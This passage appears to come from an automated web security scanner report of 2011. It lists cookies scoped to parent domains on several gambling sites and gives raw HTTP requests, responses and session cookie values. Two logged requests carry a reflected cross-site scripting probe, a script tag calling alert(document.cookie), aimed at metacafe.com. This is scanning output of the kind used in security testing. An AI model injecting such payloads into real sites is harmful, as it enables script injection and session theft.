"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

11.15. http://www.vincite.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.vincite.net
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

winnings[sessionId]=103122908; path=/; domain=.vincite.net
WinningsSID=v0b5gg3j3lfm7o3fa7sric4bp6; path=/; domain=.vincite.net
winnings[vid]=540294; expires=Tue, 15-May-2012 12:02:13 GMT; path=/; domain=.vincite.net

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?vid=540129 HTTP/1.1
Host: www.vincite.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.16. http://www.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

winnings[sessionId]=103122734; path=/; domain=.winnings.com
WinningsSID=4ghnev4ktomhtdlm6482aj6993; path=/; domain=.winnings.com
winnings[vid]=540130; expires=Tue, 15-May-2012 11:41:07 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.winnings.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.17. http://www.winnings.com/xmlrpc.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.winnings.com
Path:	/xmlrpc.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

winnings[sessionId]=103123582; path=/; domain=.winnings.com
WinningsSID=gpfb87spheemujmu5ahuq54h47; path=/; domain=.winnings.com
winnings[vid]=540957; expires=Tue, 15-May-2012 12:35:10 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xmlrpc.php HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=gpfb87spheemujmu5ahuq54h47; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[sessionId]=103123582; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540957; expires=Tue, 15-May-2012 12:35:10 GMT; path=/; domain=.winnings.com
Date: Mon, 16 May 2011 12:35:09 GMT
Connection: close
Content-Length: 42

XML-RPC server accepts POST requests only.

11.18. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 15-May-2013 12:49:29 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=4000008&rn=856024745&c7=http%3A%2F%2Fwww.metacafe.com%2Ffplayer%2F%3F4702d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ebe96a23f3a3%3D1&c15=0&c8=Metacafe%20-%20Online%20Video%20Entertainment%20-%20Free%20video&c9=http%3A%2F%2Fburp%2Fshow%2F19&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 16 May 2011 12:49:29 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 15-May-2013 12:49:29 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

11.19. http://bid.openx.net/json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

s=801a3d1e-777d-48cc-89cd-b6ac2981e332; version=1; path=/; domain=.openx.net;
p=1305550332; version=1; path=/; domain=.openx.net; max-age=63072000;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?c=OXM_6670393876&pid=d6536fd1-a88d-43f5-b56c-d55966e08548&s=728x90&f=0.56&url=http%3A%2F%2Fad.doubleclick.net%2FN6707%2Fadi%2Fmeta.homepage%2FadminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&cid=oxpv1%3A34-632-1929-1558-4408&hrid=b7d3130441279250d437d1e5dbea5016-1305550329 HTTP/1.1
Host: bid.openx.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: i=de6f5b1d-dd7a-4d95-8142-2b91139d25bd; p=1305468134

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=801a3d1e-777d-48cc-89cd-b6ac2981e332; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1305550332; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_6670393876({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAI3POVLDMBQG4D924ihSIE
...[SNIP]...

11.20. http://br.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://br.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_12=EncryptedUniqueVisitorID=C16CF2284F72CAB44BCB7639FE94FB79&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:10:00 GMT; path=/
UniqueVisitorID=C16CF2284F72CAB44BCB7639FE94FB79; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: br.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3hrlta45ydrtdn55kcs1yk45; path=/; HttpOnly
Set-Cookie: LanguageCode=BRA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=C16CF2284F72CAB44BCB7639FE94FB79&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:10:00 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: UniqueVisitorID=C16CF2284F72CAB44BCB7639FE94FB79; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: LanguageCode=BRA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.21. http://br.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://br.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_27=EncryptedUniqueVisitorID=133D5CFD64A86A8D4E41FBAF35DFED9F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:02:48 GMT; path=/
UniqueVisitorID=133D5CFD64A86A8D4E41FBAF35DFED9F; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: br.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kckq0e45x234ip2s44zglqzs; path=/; HttpOnly
Set-Cookie: LanguageCode=BRA; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=133D5CFD64A86A8D4E41FBAF35DFED9F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:02:48 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: UniqueVisitorID=133D5CFD64A86A8D4E41FBAF35DFED9F; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: LanguageCode=BRA; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.22. http://da.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://da.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_12=EncryptedUniqueVisitorID=BBFDDD60B27B560BD9F8970BEAFB9576&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:13:58 GMT; path=/
UniqueVisitorID=BBFDDD60B27B560BD9F8970BEAFB9576; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:13:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dmowgp551rkkdn3soilwdfnr; path=/; HttpOnly
Set-Cookie: LanguageCode=DAN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=BBFDDD60B27B560BD9F8970BEAFB9576&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:13:58 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: UniqueVisitorID=BBFDDD60B27B560BD9F8970BEAFB9576; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: LanguageCode=DAN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.23. http://da.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://da.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_27=EncryptedUniqueVisitorID=A8F6C2B6CEF5B63478AED95B09F2EE9E&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:24:19 GMT; path=/
UniqueVisitorID=A8F6C2B6CEF5B63478AED95B09F2EE9E; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:24:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=szufvcqect3lbw2c3qkhio45; path=/; HttpOnly
Set-Cookie: LanguageCode=DAN; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=A8F6C2B6CEF5B63478AED95B09F2EE9E&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:24:19 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: UniqueVisitorID=A8F6C2B6CEF5B63478AED95B09F2EE9E; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: LanguageCode=DAN; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.24. http://da.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://da.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_1=EncryptedUniqueVisitorID=DB22A1CF13A4E4246723822650A86F19&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:02:39 GMT; path=/
UniqueVisitorID=DB22A1CF13A4E4246723822650A86F19; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1qfvcvf4rzhgeoufgbf30g55; path=/; HttpOnly
Set-Cookie: LanguageCode=DAN; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=DB22A1CF13A4E4246723822650A86F19&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:02:39 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: UniqueVisitorID=DB22A1CF13A4E4246723822650A86F19; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: LanguageCode=DAN; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.25. http://da.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://da.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_8=EncryptedUniqueVisitorID=C13466F88A3C2E3F7EF40181A63E88A6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:33:44 GMT; path=/
UniqueVisitorID=C13466F88A3C2E3F7EF40181A63E88A6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jerxym45yqox5445cm4l3m45; path=/; HttpOnly
Set-Cookie: LanguageCode=DAN; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=C13466F88A3C2E3F7EF40181A63E88A6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:33:44 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: UniqueVisitorID=C13466F88A3C2E3F7EF40181A63E88A6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: LanguageCode=DAN; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.26. http://de.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_12=EncryptedUniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
UniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1tkc3d3ftxfybx55a2wzek55; path=/; HttpOnly
Set-Cookie: LanguageCode=GER; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: UniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: LanguageCode=GER; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.27. http://de.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_27=EncryptedUniqueVisitorID=2A1881799ACDD7EA946C26947FFD682F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:35:06 GMT; path=/
UniqueVisitorID=2A1881799ACDD7EA946C26947FFD682F; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pitwctjdcp5uqtuzoc2m5l55; path=/; HttpOnly
Set-Cookie: LanguageCode=GER; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=2A1881799ACDD7EA946C26947FFD682F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:35:06 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: UniqueVisitorID=2A1881799ACDD7EA946C26947FFD682F; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: LanguageCode=GER; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
